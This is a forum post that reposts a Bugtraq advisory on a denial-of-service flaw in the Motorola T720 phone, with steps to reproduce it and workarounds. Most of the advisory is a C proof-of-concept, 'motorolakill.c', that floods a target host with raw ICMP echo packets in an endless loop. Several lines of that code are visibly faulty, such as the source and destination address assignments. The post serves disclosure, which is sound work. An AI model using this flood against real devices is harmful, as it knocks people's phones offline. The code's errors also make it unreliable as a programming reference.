Hey Hey,

I was going to post this on my other thread, since it kinda applies there. However we were more discussing virii and worms and what not over there, and this is a DoS. So I'll start a new thread about it, besides this forum is kinda empty.

This was posted to bugtraq today and I thought some people might find it kinda interesting. I thought it was an interesting read because I own this phone, having it in my hand right now, and I know around here at least, it is a fairly common phone.

Anyways here's the post:

The bug
########

The vulnerability lies within the TCP/IP stack of the Motorola T720 cell phone. When the phone receives an abnormal amount of IP traffic, the phone powers-off when the user attempts to access the network (e.g through the WAP browser).

The vulnerability can be reproduced in the following
way:

-
1) Connect the phone to the Internet.
2) Flood the device with IP traffic (i.e SYN packets or ICMP_ECHO requests (ping packets)).
3) Run the WAP browser.
-

At this point, the phone should power-off, and lose network connectivity.

--
NOTE:

This vulnerability is likely due to a bug in the phone's IP implementation which bails when a certain backlog of IP packets is exceeded.
--


The exploit
############

A simple proof-of-concept is demonstrated below:


# motorolakill.c
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <host>\n", argv[0]);
exit(0);
}

int sock;
char packet[5000];
int on = 1;
struct sockaddr_in dest;
struct hostent *host;
struct iphdr *ip = (struct iphdr *) packet;
struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
if((host = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve host!\n");
exit(-1);
}

if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
printf("Couldn't make socket!\n");
printf("You must be root to create a raw socket.\n");
exit(-1);
}

if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0) {
perror("setsockopt");
exit(1);
}

dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)host->h_addr);
ip->ihl = 5;
ip->id = htons(1337);
ip->ttl = 255;
ip->tos = 0;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->frag_off = 0;
ip->saddr = htons("1.3.3.7");
ip->daddr = inet_ntoa(dest.sin_addr);
ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);
ip->check = 0;
icmp->checksum = 0;
icmp->type = ICMP_ECHO;
icmp->code = 0;
printf("Ping flooding %s!\n", argv[1]);

/* begin flooding here. */
while(1) {
sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
}
return(0);
}
# EOF motorolakill.c


Use the steps listed above to reproduce the vulnerability. The above programs shouldn't need long to cause the phone to poweroff.

(please note the phone will only poweroff if the user attempts to access the network. If the phone is sitting idle, it won't be affected. The user must open the WAP browser during the attack, for example.
This will cause the phone to poweroff quickly.)



The fix
########

No solution exists. Possible workarounds are:

- Connect the phone through a router (possibly via GSM to allow roaming), filtering out all malicious traffic to the device.

- Use another system as a gateway system, firewalling the cellphone, and filtering traffic to the device.
I plan on testing this as soon as I get a chance, however I must first create a small website to give me my IP since I have no idea what my IP address is for my cell phone.

Anyways check it out and enjoy.

Peace,
HT